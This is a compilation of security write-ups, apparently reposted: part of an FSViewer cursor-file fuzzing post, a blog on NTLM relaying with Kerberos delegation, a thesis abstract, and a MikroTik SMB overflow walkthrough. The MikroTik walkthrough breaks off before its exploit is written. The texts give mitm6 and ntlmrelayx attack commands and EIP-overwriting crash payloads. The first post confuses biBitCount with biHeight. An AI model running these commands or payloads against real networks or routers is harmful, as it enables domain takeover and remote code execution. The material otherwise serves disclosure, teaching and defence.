At this point you may be realising that we have managed to create a fully working exploit without actually knowing anything about the underlying vulnerability (apart from it having something to do with biBitCount). In normal circumstances this lazy approach to exploit development will not work. Rarely will the EIP value be read directly from your file without some sort of modification, and on the off chance it is, overwriting values in memory (41414141, 42424242, 43434343, etc.) will either cause a different exception or force execution down a separate code path that doesn’t hit our original exception. So if you only came here to see calc get popped, now is a great time to stop reading!

ReadFile

After a while of searching, I found a call to ReadFile() at 0x0040B9F8 that appears to be reading our cursor file. ReadFile() performs 4 reads from our file before the exception occurs, the sizes of which are 0x6, 0x10, 0x28, and then 0x800 bytes. After looking at the CUR/ICO file format, the first three reads make perfect sense:

ICONDIR Structure (0x6 bytes)
ICONDIRENTRY Structure (0x10 bytes)
BITMAPINFOHEADER Structure (0x28 bytes)

As we know from our original file diffing, the only change is to the biBitCount within BITMAPINFOHEADER, where we changed the value from 0x0001 to 0x3089. So let’s skip to the 0x28-byte read and see what happens to our value.
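That 0x28-byte read matches the standard 40-byte BITMAPINFOHEADER layout, which can be decoded with a few lines of Python. This is a sketch for inspecting our own samples, not FSViewer's code, and it assumes the header blob has already been sliced out of the file at the right offset:

```python
import struct

# Standard 40-byte BITMAPINFOHEADER: biSize, biWidth, biHeight, biPlanes,
# biBitCount, biCompression, biSizeImage, biXPelsPerMeter, biYPelsPerMeter,
# biClrUsed, biClrImportant
BIH = struct.Struct("<IiiHHIIiiII")

def parse_bih(blob: bytes) -> dict:
    """Decode one BITMAPINFOHEADER from the start of `blob`."""
    fields = ("biSize", "biWidth", "biHeight", "biPlanes", "biBitCount",
              "biCompression", "biSizeImage", "biXPelsPerMeter",
              "biYPelsPerMeter", "biClrUsed", "biClrImportant")
    return dict(zip(fields, BIH.unpack(blob[:BIH.size])))
```

With this, checking what a mutated sample carries in biHeight or biBitCount is a one-liner instead of counting hex columns by hand.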
PUSH EAX                 ; |pBytesRead = 0012F6F8
PUSH EDI                 ; |BytesToRead = 28 (40.)
PUSH ESI                 ; |Buffer = 0012FB20
PUSH EBX                 ; |hFile = 0000025C (window)
CALL <ReadFile>

After the call to ReadFile() we can clearly see our value has been read into the buffer at 0012FB20. Stepping through the code, we see that at 005AC6C4 the biBitCount value from our fuzzer (0x3089) is read into EAX and saved at EBP-34. At 005AC6FD our value of 0x3089 is then read into ECX, 1 is moved into EAX, and then something interesting happens: a logical shift left is performed on EAX by CL bits. As we can directly control CL (currently with a value of 0x89), this results in shl 1, 89, which yields a very large value (0x20000000000000000000000). This number is significantly larger than the maximum positive value that can be stored in a 32-bit signed integer. It obviously cannot be saved into EAX, so what does happen? Stepping over this instruction, we see EAX now has a value of 0x200, which is then stored at EBP-40. Consulting the x86 guide, it can be found that “shift counts of greater than 31 are performed modulo 32”.

At 005AC72E our value of 0x200 is moved into ECX, before another shift left is performed on it, this time with a shift of 2 bits. ECX now holds our new value of 0x800. Stepping into the call at 005AC73F (by pressing F7) and stepping once (F8), you will arrive at a call to 0040B9E4; step into this call too. We can now see the call to ReadFile(). Looking at the parameters, we can see that ReadFile() will be reading 0x800 bytes into a buffer at 0012F720. This means we can directly control the number of bytes being read into the buffer. The process looks like this:

1. ReadFile() reads 0x28 bytes, including our controlled value of 0x3089, and places it onto the stack;
2. Our value is then used to perform a logical shift (SHL 1, 89), resulting in a controlled value of 0x200 being saved onto the stack;
3. Another SHL is performed (SHL 200, 2), resulting in a value of 0x800;
4.
This value (0x800) is then passed to ReadFile() as the “BytesToRead” parameter;
5. 0x800 bytes are read into the buffer at 0012F720.

If you think back to the start of this post, you will also remember that the cause of the crash was Peach modifying biHeight from 0x0001 to 0x3089. For our non-mutated sample.cur, the process would be the following:

1. ReadFile() reads 0x28 bytes, including the 0x0001 biHeight value;
2. SHL 1, 01 is performed, resulting in a value of 0x02;
3. Another SHL is performed (SHL 02, 2), resulting in a value of 0x08;
4. 0x08 is then passed to ReadFile() as the “BytesToRead” parameter;
5. 0x08 bytes are read into the buffer at 0012F720.

As no bounds checking appears to be going on, the buffer is likely expecting 0x08 bytes but instead receives 0x800. So finally, let’s look at the SEH chain before and after the call to ReadFile().

Before:

After:

Conclusion

I like to think this post sits somewhere between the basic “Send AAAAA until EIP=41414141” tutorials and the more hardcore memory corruption write-ups. Obviously it’s still a basic overflow issue, but it does cover a number of things that authors often skip, e.g. how the original issue was found and the root cause of the vulnerability. I’m purely a hobbyist when it comes to memory corruption issues, so I suspect there are a number of technical errors within this post; if you do spot any issues then please contact me and I’ll try to fix them. I hope you enjoyed my MSPaint artwork!
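As a final sanity check on the shift arithmetic above, the two shifts can be reproduced in Python; the mod-32 mask mirrors how x86 truncates SHL counts:

```python
def bytes_to_read(header_value: int) -> int:
    """Mirror FSViewer's two shifts; x86 SHL masks its count modulo 32."""
    eax = 1 << (header_value & 0x1F)  # shl eax, cl
    return eax << 2                   # shl eax, 2

print(hex(bytes_to_read(0x3089)))  # 0x800 -- the fuzzed value
print(hex(bytes_to_read(0x0001)))  # 0x8   -- the benign sample.cur value
```

Both the fuzzed and the benign header values reproduce exactly the BytesToRead sizes observed in the debugger.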
References

If you enjoyed this post and want to read more similar write-ups then please check out the following links:

https://www.fuzzysecurity.com/tutorials.html
https://www.corelan.be/index.php/articles/ (Exploit Writing Tutorials)
https://www.corelan.be/index.php/2013/02/26/root-cause-analysis-memory-corruption-vulnerabilities/
https://www.corelan.be/index.php/2013/07/02/root-cause-analysis-integer-overflows/
http://www.flinkd.org/fuzzing-with-peach-part-1/

Timeline

2016: Issue discovered and reported to vendor
2017: *Crickets*
2018: *Crickets*
March 2019: This blog post detailing the vulnerability published

Daniel C

Sursa: https://medium.com/@DanielC7/introduction-to-file-format-fuzzing-exploitation-922143ab2ab3
  23. The worst of both worlds: Combining NTLM Relaying and Kerberos delegation 5 minute read After my in-depth post last month about unconstrained delegation, this post will discuss a different type of Kerberos delegation: resource-based constrained delegation. The content in this post is based on Elad Shamir’s Kerberos research and combined with my own NTLM research to present an attack that can get code execution as SYSTEM on any Windows computer in Active Directory without any credentials, if you are in the same network segment. This is another example of insecure Active Directory default abuse, and not any kind of new exploit. Attack TL;DR If an attacker is on the local network, either physically (via a drop device) or via an infected workstation, it is possible to perform a DNS takeover using mitm6, provided IPv6 is not already in use in the network. When this attack is performed, it is also possible to make computer accounts and users authenticate to us over HTTP by spoofing the WPAD location and requesting authentication to use our rogue proxy. This attack is described in detail in my blog post on this subject from last year. We can relay this NTLM authentication to LDAP (unless mitigations are applied) with ntlmrelayx and authenticate as the victim computer account. Computer accounts can modify some of their own properties via LDAP, which includes the msDS-AllowedToActOnBehalfOfOtherIdentity attribute. This attribute controls which users can authenticate to the computer as almost any account in AD via impersonation using Kerberos. This concept is called Resource-Based constrained delegation, and is described in detail by Elad Shamir and harmj0y. Because of this, when we relay the computer account, we can modify the account in Active Directory and give ourselves permission to impersonate users on that computer. We can then connect to the computer with a high-privilege user and execute code, dump hashes, etc. 
The beauty of this attack is that it works by default and does not require any AD credentials to perform.

No credentials, no problem

If you’ve already read Elad’s blog, you may have noticed that control over a computer account (or any other account with a Service Principal Name) is required to perform the S4U2Proxy attack. By default, any user in Active Directory can create up to 10 computer accounts. Interestingly enough, this is not limited to user accounts, but can be done by existing computer accounts as well! So if we can get any user or computer to connect to our NTLM relay, we can create a computer account with ntlmrelayx. It is required here to relay to LDAP over TLS, because creating accounts is not allowed over an unencrypted connection. These computer account credentials can be used for all kinds of things in AD, such as querying domain information or even running BloodHound.

Relaying and configuring delegation

Let’s run the full attack. First we start mitm6 to take over the DNS on our target, in this case ICORP-W10 (a fully patched default Windows 10 installation). I’m limiting the attack to just this host here:

sudo mitm6 -hw icorp-w10 -d internal.corp --ignore-nofqdn

Now it might take a while before the host requests an IPv6 address via DHCPv6 or starts requesting a WPAD configuration. Your best chances are when the victim reboots or re-plugs their network cable, so if you’re on a long-term assignment, early mornings are probably the best time to perform this attack. In either case you’ll have to be patient (or just attack more hosts, but that’s also less quiet).
In the meantime, we also start ntlmrelayx, using the --delegate-access argument to enable the delegation attack and the -wh attacker-wpad argument to enable WPAD spoofing and authentication requests:

ntlmrelayx.py -t ldaps://icorp-dc.internal.corp -wh attacker-wpad --delegate-access

After a while, mitm6 should show our victim connecting to us as DNS server for the WPAD host we set, and we see ntlmrelayx receiving the connection, creating a new computer account, and granting it delegation rights to the victim computer.

Next we can use getST.py from impacket, which will do all the S4U2Self and S4U2Proxy magic for us. You will need the latest version of impacket from git to include resource-based delegation support. In this example we will be impersonating the user admin, which is a member of the Domain Admins group and thus has administrative access on ICORP-W10. We have now obtained a Kerberos service ticket for the user admin, valid for cifs/icorp-w10.internal.corp. This only lets us impersonate this user to this specific host, not to other hosts in the network. With this ticket we can do whatever we want on the target host, for example dumping hashes with secretsdump. The attacker now has full control over the victim workstation.

Other abuse avenues

This blog highlights the use of mitm6 and WPAD to perform the relay attack entirely without credentials. Any connection over HTTP to a host that is considered part of the Intranet Zone by Windows can be used in an identical manner (provided automatic intranet detection is enabled). Elad’s original blog described using WebDAV to exploit this on hosts. Another attack avenue is (again) PrivExchange, which makes Exchange authenticate as SYSTEM unless the latest patches are installed.

Tools

The updated version of ntlmrelayx is available in a branch on my fork of impacket. I’ll update the post once this branch gets merged into the main repository.
Mitigations

As this attack consists of several components, there are several mitigations that apply to it.

Mitigating mitm6

mitm6 abuses the fact that Windows queries for an IPv6 address even in IPv4-only environments. If you don’t use IPv6 internally, the safest way to prevent mitm6 is to block DHCPv6 traffic and incoming router advertisements in Windows Firewall via Group Policy. Disabling IPv6 entirely may have unwanted side effects. Setting the following predefined rules to Block instead of Allow prevents the attack from working:

(Inbound) Core Networking - Dynamic Host Configuration Protocol for IPv6 (DHCPV6-In)
(Inbound) Core Networking - Router Advertisement (ICMPv6-In)
(Outbound) Core Networking - Dynamic Host Configuration Protocol for IPv6 (DHCPV6-Out)

Mitigating WPAD abuse

If WPAD is not in use internally, disable it via Group Policy and by disabling the WinHttpAutoProxySvc service. Further mitigation and detection measures are discussed in the original mitm6 blog.

Mitigating relaying to LDAP

Relaying to LDAP and LDAPS can only be mitigated by enabling both LDAP signing and LDAP channel binding.

Mitigating resource based delegation abuse

This is hard to mitigate as it is a legitimate Kerberos concept. The attack surface can be reduced by adding Administrative users to the Protected Users group or marking them as Account is sensitive and cannot be delegated, which will prevent any impersonation of that user via delegation. Further mitigations and detection methods are available here.

Credits

@Elad_Shamir and @3xocyte for the original research and relay POC
@agsolino for building and maintaining impacket and implementing all the cool Kerberos stuff
@gentilkiwi for Kekeo and @harmj0y for Rubeus and their Kerberos research

Updated: March 04, 2019

Dirk-jan Mollema

Hacker, red teamer, researcher. Likes to write infosec-focussed Python tools.
This is my personal blog, mostly containing research on topics I find interesting, such as Windows, Active Directory and cloud stuff. Source: https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/
  24. Daniel Gruss
Software-based Microarchitectural Attacks
PhD Thesis
Assessors: Stefan Mangard, Thorsten Holz
June 2017

Modern processors are highly optimized systems where every single cycle of computation time matters. Many optimizations depend on the data that is being processed. Software-based microarchitectural attacks exploit effects of these optimizations. Microarchitectural side-channel attacks leak secrets from cryptographic computations, from general purpose computations, or from the kernel. This leakage even persists across all common isolation boundaries, such as processes, containers, and virtual machines. Microarchitectural fault attacks exploit the physical imperfections of modern computer systems. Shrinking process technology introduces effects between isolated hardware elements that can be exploited by attackers to take control of the entire system. These attacks are especially interesting in scenarios where the attacker is unprivileged or even sandboxed.

In this thesis, we focus on microarchitectural attacks and defenses on commodity systems. We investigate known and new side channels and show that microarchitectural attacks can be fully automated. Furthermore, we show that these attacks can be mounted in highly restricted environments such as sandboxed JavaScript code in websites. We show that microarchitectural attacks exist on any modern computer system, including mobile devices (e.g., smartphones), personal computers, and commercial cloud systems.

This thesis consists of two parts. In the first part, we provide background on modern processor architectures and discuss state-of-the-art attacks and defenses in the area of microarchitectural side-channel attacks and microarchitectural fault attacks. In the second part, a selection of our papers is provided without modification from their original publications. I have co-authored these papers, which have subsequently been anonymously peer-reviewed, accepted, and presented at renowned international conferences.

Download: https://gruss.cc/files/phd_thesis.pdf
  25. Finding and exploiting CVE-2018–7445 (unauthenticated RCE in MikroTik's RouterOS SMB)

maxi
Mar 5

Summary for the anxious reader

- CVE-2018–7445 is a stack buffer overflow in the SMB service binary present in all RouterOS versions and architectures prior to 6.41.3/6.42rc27.
- It was found using dumb fuzzing assisted with the Mutiny Fuzzer tool from Cisco Talos and reported/fixed about a year ago.
- The vulnerable binary was not compiled with stack canaries.
- The exploit does ROP to mark the heap as executable and jumps to a fixed location in the heap. The heap base was not randomized.
- Dumb fuzzing still found bugs in interesting targets in 2018 (although I'm sure there must be none left for 2019!)
- The post describes the full process from target selection to identifying a vulnerability and then producing a working exploit.

Introduction

The last few years have seen a surge in the number of public vulnerabilities found and reported in MikroTik RouterOS devices, from a remote buffer overflow affecting the built-in web server included in the CIA Vault 7 leak to a plethora of other vulnerabilities reported by Kirils Solovjovs from Possible Security and Jacob Baines from Tenable that result in full remote compromise. MikroTik was recently added to the list of eligible router brands in the exploit acquisition program maintained by Zerodium, including a one-month offer to buy pre-auth RCEs for $100,000. This might reflect an increasing interest in MikroTik products and their security posture. This blog post is an attempt to make a small contribution to the ongoing MikroTik RouterOS vulnerability research. I will outline the steps we took with my colleague Juan (thanks Juan!) during our time together at Core Security to find and exploit CVE-2018–7445, a remote buffer overflow in MikroTik's RouterOS SMB service that could be triggered from the perspective of an unauthenticated attacker.
The vulnerability is easy to find and exploitation is straightforward, so the idea is to provide a detailed walk-through that will (hopefully!) be useful for other beginners interested in memory corruption. I will try to cover the full process from "hey! let's look at this MikroTik thing" to actually finding a vulnerability in a network service and writing an exploit for it. The original advisory can be found here. Mandatory disclaimer: I am no longer affiliated with Core Security, so the content of this post does not reflect its views or represent the company in any way.

Setup

The vulnerability is present in all architectures and devices running RouterOS prior to 6.41.3/6.42rc27, so the first step is getting a vulnerable system running. MikroTik makes this very easy by maintaining an archive of all previously released versions. It is also possible to download the Cloud Hosted Router version of RouterOS, which is available as a virtual machine that boasts full RouterOS features. This allows running RouterOS in x86–64 architectures using popular hypervisors without needing an actual hardware device. Let's get the 6.40.5 version of the Cloud Hosted Router from here and create the virtual machine on VirtualBox. Default administrator credentials consist of admin as the username and an empty password.

[Screenshot: RouterOS administrative console]

The RouterOS console is a restricted environment and does not allow the user to execute any command outside of a pre-defined set of configuration options. In order to replicate the vulnerability discovery, the SMB service needs to be enabled. This can be achieved with the ip smb set enabled=yes command.

[Screenshot: Enabling SMB and checking the IP address of the device]

Note that the fact that the service is not enabled by default makes the likelihood of active exploitation much smaller.
In addition, you should probably not be exposing your SMB service to public networks, but well, there are always those pesky users in the internal network that might have access to this service. The restricted console is not suitable for proper debugging, so before looking for vulnerabilities it is useful to have full shell access. Kirils Solovjovs has published extensive research on jailbreaking RouterOS, including the release of a tool that can be used to jailbreak 6.40.5. It would not make sense to repeat the underlying details here, so head to Kirils' research hub or the more recent post by Jacob Baines for newer versions, where the entry point used for 6.40.5 has been patched. Jailbreaking RouterOS 6.40.5 is as easy as cloning the https://github.com/0ki/mikrotik-tools repository and running the interactive exploit-backup/exploit_full.sh exploit pointing to our VM.

[Screenshot: Jailbreak tool by 0ki targeting 6.40.5]

Finally, download a pre-compiled version of GDB from https://github.com/rapid7/embedded-tools/raw/master/binaries/gdbserver/gdbserver.i686 and upload it to the system using FTP. Connecting to the device via Telnet will then allow us to attach to running processes and debug them properly. We are now ready to start looking for vulnerabilities in the network services.

Target selection

There are lots of services running in RouterOS. A quick review shows common services such as HTTP, FTP, SSH, and Telnet, and some other RouterOS-specific services such as the bandwidth test server running on port 2000. Jacob Baines pointed out that over 90 different binaries that implement network services can be reached by speaking the Winbox protocol (see The Real Attack Surface in his excellent blog post). We were not aware of all that reachable functionality when we started poking around with RouterOS and did not invest the time to reverse engineer the binaries that spoke Winbox, so we just went ahead and looked at the few binaries that were explicitly listening on the network.
Most (all?) services in RouterOS seem to have been implemented from scratch, so there are thousands of lines of custom low-level code waiting to be audited. Our objective was to achieve unauthenticated remote code execution, and on a first look the binaries for common services such as FTP or Telnet did not provide much reachable functionality without providing credentials. This made us turn to other services that might not be enabled by default but require the implementation of a rich feature set. The fact that these services are not enabled by default means they might have been neglected by other attackers wanting to maximize their ROI on vulnerabilities that affect default installations of RouterOS and are therefore much more valuable. By following this rationale and inspecting the available services we decided to take a look at the SMB implementation.

Finding the vulnerability

We know we want to find vulnerabilities in the SMB service. We have the virtual machine set up, the service running, full shell access to the device, and the ability to debug any process. How do we find a vulnerability? One option would be to disassemble the binary and look for insecure coding patterns. We would identify interesting operations such as strcpy, memcpy, etc. and see if the correct size checks are in place. We would then see if those code paths can be reached with user-controlled input. We could combine this with dynamic analysis and use our ability to attach to a running process with GDB to inspect registers at runtime, memory locations, etc. However, this can be time consuming and it is easy to feel frustrated if you do not have experience doing reverse engineering, especially with a large binary. Another option is to fuzz the network service. This approach consists of sending data to the remote service and checking if it causes unexpected behavior or a crash. This data will contain malformed messages, invalid sizes, very long strings, etc.
There are different ways to conduct the fuzzing process. The two most popular strategies are generation- and mutation-based fuzzing. Generation-based fuzzing requires knowledge of the protocol to build test cases that comply with the format specified by the protocol and will (most likely) result in more thorough coverage. More coverage means more chances of hitting vulnerable code paths and therefore more bugs. On the other hand, mutation-based fuzzing assumes no prior knowledge of the protocol being fuzzed and takes much less effort, at the cost of potentially poor code coverage and additional difficulties in protocols that need to compute checksums to ensure data integrity. We decided to try our luck with a dumb fuzzer and chose the Mutiny Fuzzer tool that had been released a few months earlier by the Cisco Talos team. Mutiny takes a sample of legitimate network traffic and replays it through a mutational fuzzer. In particular, Mutiny uses Radamsa to mutate the traffic.

[Screenshot: Radamsa mutation example]

Performing this kind of fuzzing has the benefit of being very quick to get up and running and, as we will see, might provide great results if we have a good selection of test cases that stress various features. Putting this together, the steps to fuzz a network service are:

1. Capture legitimate traffic
2. Create a Mutiny fuzzer template from the resulting PCAP file
3. Run Mutiny to mutate the traffic and replay it to the service
4. Observe what happens with the running service

Mutiny does provide a monitoring script that can be used to (d'oh!) monitor the service and identify weird behavior. This can be accomplished by implementing the monitorTarget function as described in https://github.com/Cisco-Talos/mutiny-fuzzer/blob/master/mutiny_classes/monitor.py. Sample checks could be pinging the remote service or connecting to it to assess its availability, monitoring the process, logs, or whatever else might signal weird behavior.
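The mutate-and-replay loop described above can be sketched in a few lines of Python. To be clear, this is a hedged illustration, not Mutiny itself: it uses a trivial random byte-overwrite mutator in place of Radamsa, and the target host and port in the usage comment are placeholders.

```python
import random
import socket

def mutate(data, rate=0.05, seed=None):
    """Dumb mutator: randomly overwrite a fraction of bytes (crude stand-in for Radamsa)."""
    rng = random.Random(seed)
    out = bytearray(data)
    for i in range(len(out)):
        if rng.random() < rate:
            out[i] = rng.randrange(256)
    return bytes(out)

def replay(host, port, template, iterations=1000):
    """Send mutated copies of the template; stop when the service refuses connections."""
    for i in range(iterations):
        payload = mutate(template, seed=i)  # seeded, so any crash is reproducible
        try:
            with socket.create_connection((host, port), timeout=2) as s:
                s.sendall(payload)
        except ConnectionRefusedError:
            print("service down after iteration %d" % i)
            return i
    return None

# Usage against the router would look like (not run here):
# template = <bytes of the captured Negotiate Protocol request>
# replay("192.0.2.1", 445, template)  # placeholder target IP
```

Seeding the mutator with the iteration number mirrors what Mutiny's numeric identifiers give you: the ability to replay the exact mutation sequence leading up to a crash.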
In this case, the SMB service will take a while to restart after a crash and log a stack trace message, so we decided it was not worth scripting any monitoring actions. Instead, we just captured the traffic throughout the fuzzing process with Wireshark and relied on the default behavior of Mutiny, which is to exit when a request fails due to a connection refused error, meaning that the service is down. This is rather rudimentary and leaves a lot of room for improvement, but it was enough for our tests. It is important to enable full logging before we initiate the fuzzing process. This could prove useful to track any crashes that might occur, as the full stack trace will be included in the logs that are located in /rw/logs/backtrace.log. This can be configured from RouterOS' web interface.

[Screenshot: Enable all logs to be written to the disk]

Another thing that proved useful was running the binary in an interactive console to get the debug output in real time. This can be achieved by killing the running process and relaunching it from the full-fledged terminal. Errors and the general status of processed requests will be printed.

[Screenshot: Get debug output as requests are processed]

Now that we have a high-level overview of the steps involved, let's recap and actually fuzz the SMB service. First we clone https://github.com/Cisco-Talos/mutiny-fuzzer.git and follow the setup instructions. The next step in our plan consists of generating some network traffic. In order to do this, open Wireshark and attempt to access a resource on the router with smbclient. Smbclient will send a Negotiate Protocol request to port 445/TCP and receive a response which we do not care about. This can be observed in the Wireshark capture. We want to use this request as the starting point to produce (hopefully!) meaningful mutations. Stop the Wireshark capture and save the request packet by going to File -> Export Specified Packets with the request packet selected. Output format should be PCAP.
Once we have the PCAP containing the request to fuzz, we prepare Mutiny's .fuzzer file with the mutiny_prep.py interactive script. It is a good idea to review the resulting file to identify any weirdness that could come up during conversion. Here we could configure Mutiny to fuzz only parts of the message. This would be useful if we wanted, for example, to focus our efforts on individual fields. In this case we will fuzz the entire message. It is worth mentioning that Mutiny can also handle multi-message exchanges. If the test cases we use as initial templates contain parts that do not cause the program to take different paths, then all the modifications we make to this data will never increase code coverage, which results in wasted time and inefficient fuzzing. Without going into much detail of the SMB protocol, we can observe that the request contains a list of about a dozen Requested Dialects. Each dialect corresponds to a specific set of supported commands. This could be interesting if we were fuzzing a particular set of commands, but right now we do not care about this. Providing a shorter list of one or two dialects would result in Radamsa creating more meaningful mutations and a larger variety of SMB request types being sent. Our reasoning is that mutating one dialect or another will not make the application take very different paths in a single message conversation, so we edit the template to look as follows:

outbound fuzz '\x00\x00\x00\xbe\xffSMBr\x00\x00\x00\x00\x18C\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfe\xff\x00\x00\x00\x00\x00\x9b\x00\x02NT LANMAN 1.0\x00\x02NT LM 0.12\x00'

With the template in place, we can begin fuzzing. Remember to capture the full session with Wireshark. Mutiny can also record each packet sent, but we found it easier to check Wireshark to see when the server stopped responding after a crash.
Open a telnet connection to the router using the devel account and run pkill smb; /nova/bin/smb to start a new SMB process and observe its output. The following command will instruct Mutiny to sleep half a second between packets and log all requests:

./mutiny.py -s 0.5 --logAll negotiate_protocol_request-0.fuzzer HOST

The verbose output will show packets of different sizes being sent along with the numeric identifier of each of them. This value is useful to repeat the exact same sequence of mutations and provides a way to reproduce crashes. This is important because, even if we find a crash, previous requests could have corrupted something or altered the application state in a way that is required for the crash to happen. If we cannot recreate the state before the crash, we might be left empty-handed even if we identify which particular request ended up causing the crash. If the fuzzing session is interrupted and we do not want to replay the previous mutations, it is possible to use the -r parameter to instruct Mutiny to start sending mutations from that iteration onwards (e.g. -r1500- will send mutations 1500, 1501, 1502, and so on). If we observe Wireshark while the fuzzer runs, we will see that not all packets conform to the expected format, which is a good thing for us. Vulnerabilities usually arise when the application cannot handle unexpected data in a proper manner. The terminal where we are running the SMB binary will also contain useful data to confirm that we are in fact feeding malformed requests to the service. Now we let the fuzzer run. We can play with different delay values and see if the server can process requests that fast, but two requests per second is OK for this proof of concept. A few minutes later Mutiny finishes running after trying to connect to the service and not being able to do so. If we take a look at the terminal running the binary, we will be greeted with a Segmentation fault message.
As mentioned before, the backtrace.log file contains the register dump and a bit more information about what caused the crash. Finally, by inspecting Wireshark we can see that the last packet sent to the server is described as "Session request to Illegal NetBIOS name".

Understanding the crash

First we will make sure that we can reproduce the crash at will. Copying the last packet sent by Mutiny or extracting the message from Wireshark is equivalent here. We are not interested in the layers below NetBIOS, as we will create a small script to send the packet over TCP. Extract the raw bytes from the exported file:

>>> open("req").read()
'\x81\x00\x00 \x00\x00 \x00\x00 \x00\x00 \x00\x00 \x00\x00 \x00\x00 \x00\x00 \x00\x00 \x00\x00 \x00\x00 \x00\x00'

Create a simple Python script that sends the payload over to the remote service. Note that I have replaced the whitespace with its equivalent hex representation for clarity. Run the script a few times after spawning a new SMB process (pkill smb && /nova/bin/smb) and see what happens. We now have a reliable way to reproduce the crash with a single request. In this case we are dealing with a protocol for which Wireshark has a dissector, so we can use that information to understand the cause of the crash at a protocol level. Apparently, sending a NetBIOS session request (message type 0x81) exercises a vulnerable code path in the SMB binary. Let's extract the binary from the router so we can open it in a disassembler. Copy /nova/bin/smb to /flash/rw/pckg so it can be accessed via FTP and download it. This is also a good time to set up debugging of the process with GDB. I like to use PEDA to enhance GDB's display and add some useful commands. We open two connections to the target router. In one we do pkill smb && /nova/bin/smb to get real-time output, and in the other we start gdbserver attached to the newly spawned process. Finally, we open GDB on our testing machine and connect to the debugging server with target remote IP:PORT.
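A minimal version of that reproduction script might look like the following sketch. The router IP is a placeholder, and the crash body simply mirrors the 32 bytes of malformed names recovered from the capture above:

```python
import socket
import struct

def netbios_packet(msg_type, flags, body):
    """NetBIOS session service header: type (1 byte), flags (1 byte),
    length (2 bytes, big-endian), followed by the body."""
    return struct.pack(">BBH", msg_type, flags, len(body)) + body

# Session request (0x81) carrying 32 bytes of malformed NetBIOS names,
# equivalent to the crashing packet extracted from Wireshark.
crash = netbios_packet(0x81, 0x00, b"\x00\x00 " * 10 + b"\x00\x00")

def send_packet(host, data, port=445):
    with socket.create_connection((host, port), timeout=5) as s:
        s.sendall(data)

# send_packet("192.0.2.1", crash)  # placeholder router IP, not run here
```

Running send_packet a few times after restarting the SMB process should reproduce the segmentation fault on a vulnerable build.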
It is also useful to tell GDB which binary we are attached to by doing file smb. The next time it connects to the debugging server it will attempt to resolve symbols for the loaded libraries. Press c in the debugging session so execution continues as usual. Running the proof of concept will cause the service to stop due to a SIGSEGV, as expected. Here we see that a NULL pointer was dereferenced when performing a copy operation. Now, I must admit that I am very bad at static analysis, especially when C++ programs are involved. In a lame attempt to overcome this limitation, I will rely as much as I can on dynamic analysis and, in this particular case, on the information provided by the Wireshark dissector that gives more insight into the protocol fields. As can be observed, the first byte of the NetBIOS Session Service packet we are sending sets the message type to Session request (0x81). The second byte contains the flags, which in our proof of concept has all bits set to zero. The next two bytes represent the message length, which is set to 32. Finally, the remaining 32 bytes are referred to as Illegal NetBIOS names. We can assume that this size is being read at some point, and since it is the only message length information we are sending, it might be related to the vulnerability. To test this assumption, we are going to place breakpoints on common functions such as read and recv to identify where the application is reading the packet from the socket. After running the script, the program breaks in read(). We navigate to the next instructions using ni and stop right after the read system call is executed. The definition of read looks as follows:

ssize_t read(int fd, void *buf, size_t count);

EAX holds the number of bytes read, which seems to be 0x24 (36). This corresponds to the header we analyzed before: 1 byte for the message type, 1 byte for the flags, 2 bytes for the message length, and 32 bytes for the NetBIOS names.
ECX contains the address of the buffer where the data read is stored. We can use vmmap $ecx or vmmap 0x8075068 to verify that this corresponds to the heap area. Finally, EDX states that the read operation was called to read up to 0x10000 bytes from the socket. From here on we can continue stepping through the execution and add watchpoints to see what happens with our data. Since Wireshark did not identify anything relevant to the analyzed protocol in the NetBIOS names, let's change our payload to contain more distinguishable characters such as "A"s so it is easier to identify that payload in our debugging session. This is also a good idea to see if additional copy operations might be triggered that would otherwise stop at the first NULL byte. We have two bytes to play with different sizes, so before moving forward it is interesting to try sending different message lengths and see if the crash still happens. We already tried 32 bytes, so let's get crazy and do 64, 250, 1000, 4000, 16000, 65500.

- 64 (payload = "\x81\x00\x00\x40" + "A"*0x40): Same as the original proof of concept. Registers look the same.
- 250 (payload = "\x81\x00\x00\xfa" + "A"*0xfa): This is a very interesting variation. We see most registers set to 0x41414141, which is our input, we see the stack filled with lots of "A"s as well, and even EIP seems to have been corrupted.
- 1000 (payload = "\x81\x00\x03\xe8" + "A"*0x3e8): Same as the previous payload.
- 4000 (payload = "\x81\x00\x0f\xa0" + "A"*0xfa0): Same as the previous payload.
- 16000 (payload = "\x81\x00\x3e\x80" + "A"*0x3e80): This crashes at a different instruction, although we see that the stack is corrupted as well.
- 65500 (payload = "\x81\x00\xff\xdc" + "A"*0xffdc): Same as the previous payload.

So… we see the program crashes when executing different instructions.
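The size sweep above is easy to script. Here's a hedged sketch that just builds each payload; actually firing them at the service (shown commented out, with a placeholder IP) would be done between SMB process restarts:

```python
import struct

def session_request(n):
    """Session request (0x81), zero flags, big-endian length field, n filler bytes."""
    return b"\x81\x00" + struct.pack(">H", n) + b"A" * n

sizes = [64, 250, 1000, 4000, 16000, 65500]
payloads = {n: session_request(n) for n in sizes}

# Each payload can then be sent to the service between restarts, e.g.:
# import socket
# with socket.create_connection(("192.0.2.1", 445)) as s:  # placeholder IP
#     s.sendall(payloads[250])
```

Note the length field caps out at 0xffff, which is why 65500 is about as large as a single message can claim to be.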
However, the common thing we can observe is that the stack has been corrupted at some point while parsing NetBIOS names from a single NetBIOS session request message, and that most registers included parts of our payload when we sent a 250-byte message. This makes it particularly interesting for analysis, since we have a direct EIP overwrite and control over the stack. Note that we cannot really be sure that all crashes are due to the exact same bug at this point. Maybe sending a larger buffer took us down a different path that ended up being more easily exploitable, so you will have to answer that question yourself. There is also a seemingly random number of "." (0x2e) characters in between. We will see what they are later on. Right before the crash the program prints a message that reads "New connection:". This can be useful to get some situational awareness without having to add watchpoints to our buffer and track dozens of read operations (you can add a read watchpoint in GDB with rwatch *addr and execution will be stopped whenever the program accesses that memory address). We open the /nova/bin/smb binary in Binary Ninja and search for the string. There is only one occurrence, at 0x80709fb. Inspecting the cross-references shows a single usage, which is probably what we want. If we go to the beginning of sub_806b11c, we will notice that a couple of conditions need to be met in order for us to get to the block that prints the string. The first condition is a byte comparison with 0x81, which is the message type we are sending. Putting a breakpoint at 0x806b12e and following the execution allows us to inspect the register values and get a better picture of what is happening. We can observe, for example, that the size we send in the request needs to be above 0x43 to enter the interesting block. Based on our previous tests, we know that one of the functions called from this block needs to be the one corrupting the stack.
